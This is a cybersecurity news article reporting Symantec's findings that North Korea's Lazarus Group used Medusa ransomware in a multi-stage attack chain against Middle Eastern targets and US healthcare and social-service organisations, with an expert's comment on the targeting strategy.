Recent developments reveal that North Korean cyber operations are making significant inroads into the commercial ransomware landscape, indicating a heightened focus on obtaining direct financial rewards. The Symantec and Carbon Black Threat Hunter Team have reported activities by the notorious Lazarus Group, a state-sponsored actor, utilizing Medusa ransomware against targets in the Middle East and attempting to infiltrate healthcare organizations in the United States.
Although the attempts to breach U.S. institutions were ultimately unsuccessful, this incident underscores a trend where state-sponsored groups are increasingly leveraging established cybercrime tools to circumvent traditional security measures.
The Medusa ransomware functions as a service, allowing affiliates to lock down targeted networks and demand ransom in exchange for a share of the proceeds. Since its emergence in 2023, the group associated with this ransomware has reportedly executed over 300 successful attacks, affecting significant entities such as Comcast and NASCAR.
By collaborating with Medusa, Lazarus has accessed a pre-existing infrastructure that obscures their identity behind that of a typical cybercriminal organization, complicating attribution efforts for cybersecurity experts and law enforcement officials.
Multi-Stage Attack Chain
As detailed in a blog post from Symantec shared with Hackread.com, Lazarus’s operations utilize a multi-stage methodology, deploying Medusa ransomware only at the final stage. Initially, the group employs a specialized toolkit to dismantle local security defenses. Following this, they install tailored backdoors and trojans, such as Blindingcan and Comebacker, establishing persistent access to breached networks.
The attack progresses with the introduction of credential theft tools, including ChromeStealer and Mimikatz, to capture passwords. Simultaneously, a tool called Infohook collects and stages sensitive data for exfiltration. To avoid detection while transferring stolen data, the group uses RP_Proxy to internally route traffic, relying on the command-line utility Curl to return files to their servers. By the time Medusa ransomware is activated, the attackers have already seized complete control of the network and extracted the most valuable information.
Targets: Vulnerable Institutions
A closer examination of the attack targets reveals a distinct focus on organizations that provide essential social services. In recent months, the Medusa leak site has identified various U.S. victims, including a mental health nonprofit and an educational institution supporting children with autism. These attacks typically involve ransom demands averaging around $260,000, strategically set high enough for a significant payout while remaining low enough to tempt desperate organizations into compliance.
Not The First Time
This collaboration between a state-sponsored North Korean threat actor group and a ransomware entity is not unprecedented. In October 2024, Jumpy Pisces, also known as Onyx Sleet and Andariel, partnered with the Play ransomware group for cyberattacks, as reported by Hackread.com. Palo Alto Networks’ Unit 42 detected that these attackers utilized tools like the open-source Sliver and custom DTrack malware for lateral movement and persistent network presence.
Expert View
Jason Soroko, Senior Fellow at Sectigo, underscores the cold strategic rationale behind targeting vulnerable organizations. He observes that attacking facilities dedicated to mental health and autism services allows these groups to exert maximum emotional pressure, incentivizing rapid payments. The relatively modest average ransom suggests a volume-driven strategy focused on underfunded sectors that cannot endure extended downtime.
This trend indicates an eroding line between state-sponsored espionage and street-level extortion. When entities like Lazarus ally with ransomware services like Medusa, they leverage state resources against smaller institutions. As a result, organizations previously believing they were immune to international threats now find themselves caught in the crossfire of global cyber warfare, necessitating a reassessment of their data protection strategies.